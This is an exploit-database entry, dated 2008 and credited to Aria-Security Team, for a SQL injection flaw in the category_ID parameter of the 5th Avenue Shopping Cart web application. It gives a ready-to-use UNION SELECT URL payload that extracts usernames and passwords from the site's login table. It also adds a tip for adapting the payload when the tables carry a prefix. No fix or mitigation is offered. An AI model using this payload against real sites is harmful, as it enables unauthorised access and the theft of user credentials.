5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability
# Published : 2008-04-18
# Author : Aria-Security Team
# Previous Title : Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability
# Next Title : Project Based Calendaring System (PBCS) 0.7.1 Multiple Vulnerabilities

Aria-Security Team (Persian Security Team)
http://Aria-Security.Net (Persian)
http://Aria-Security.com (ENG)
--------------------------------------------
5th avenue Shopping Cart SQL Injection
Greetz: AurA, Kinglet, NULL


category_list.php?category_ID=-1/**/UNION/**/SELECT/**/1,username,password,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/login/*

note: if error says :table login does not exist the website is using a prefix for tables.


Regards,
The-0utl4w

# www.Syue.com [2008-04-18]